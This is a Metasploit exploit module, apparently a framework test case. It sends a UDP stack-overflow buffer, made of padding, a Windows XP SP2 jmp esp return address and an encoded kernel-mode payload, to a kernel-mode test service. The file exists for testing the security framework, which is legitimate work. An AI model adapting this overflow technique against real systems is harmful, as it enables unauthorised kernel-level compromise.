##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# This is a test exploit for testing kernel-mode payloads.
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::KernelMode

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Internal Kernel-mode Test Exploit',
        'Description' => "This module tests the exploitation of a kernel-mode test service.",
        'Author' => 'skape',
        'License' => MSF_LICENSE,
        'Arch' => 'x86',
        'Payload' => {
          'Space' => 1000,
          'MaxNops' => 0,
          'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
          'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
        },
        'Targets' => [
          [
            'Windows XP SP2',
            {
              'Ret' => 0x80502d7f, # jmp esp
              'Platform' => 'win',
              'Payload' =>
                {
                  'ExtendedOptions' =>
                    {
                      'Stager' => 'sud_syscall_hook',
                      'Recovery' => 'spin'
                    }
                }
            }
          ],
        ],
        'DefaultTarget' => 0
      )
    )
  end

  def autofilter
    false
  end

  def check
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    connect_udp

    print_status("Sending #{payload.encoded.length} byte payload...")

    buf =
      rand_text_alphanumeric(260) +
      "\xbe\x7f\x00\x00" +
      rand_text_alphanumeric(28) +
      [target.ret].pack('V') +
      rand_text_alphanumeric(8) +
      payload.encoded

    udp_sock.put(buf)

    select(nil, nil, nil, 2)

    disconnect_udp
  end

end
